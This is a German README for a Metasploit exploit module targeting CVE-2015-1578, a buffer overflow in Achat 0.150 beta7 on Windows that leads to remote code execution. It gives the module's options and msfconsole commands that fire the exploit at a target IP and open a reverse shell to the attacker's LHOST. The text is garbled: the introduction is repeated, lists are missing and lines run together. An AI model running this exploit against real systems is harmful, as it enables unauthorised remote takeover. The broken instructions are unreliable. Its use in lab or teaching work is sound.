Dies ist ein Proof-of-Concept-Metasploit-Modul-Exploit für CVE-2015-1578, eine Buffer-Overflow-Sicherheitslücke in Achat 0.150 beta7 unter Windows. Die Ausnutzung führt zur Remotecodeausführung über ein präpariertes UDP-Paket.
Dies ist ein Metasploit-Modul für CVE-2015-1578, eine Pufferüberlauf-Schwachstelle in Achat 0.150 beta7 unter Windows. Die Ausnutzung führt zu einer Remote-Code-Ausführung über ein manipuliertes UDP-Paket.
Dieses Modul dient als sauberes, minimales und gut strukturiertes Beispiel für die Entwicklung von Metasploit-Exploits. Es demonstriert:
msfvenommsfvenom in Ihrem $PATHmsfvenom zur Generierung eines Payloads mit x86/unicode_mixed-Kodierung und benutzerdefinierten ungültigen Zeichen./install.sh
Starten Sie dann Metasploit und führen Sie Folgendes aus:
reload_all
use exploit/windows/yaldobaoth/achat_bof
Optionen
RHOSTS – Ziel-IP-Adresse (erforderlich)LHOST – Lokale Host-IP für die Reverse-Shell (erforderlich)LPORT – Lokaler Port für die Reverse-Shell (Standard: 4444)RPORT – Remote-UDP-Port auf dem Ziel (Standard: 9256)Anwendungsbeispiel
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
Dies wird:
LHOST:LPORT warten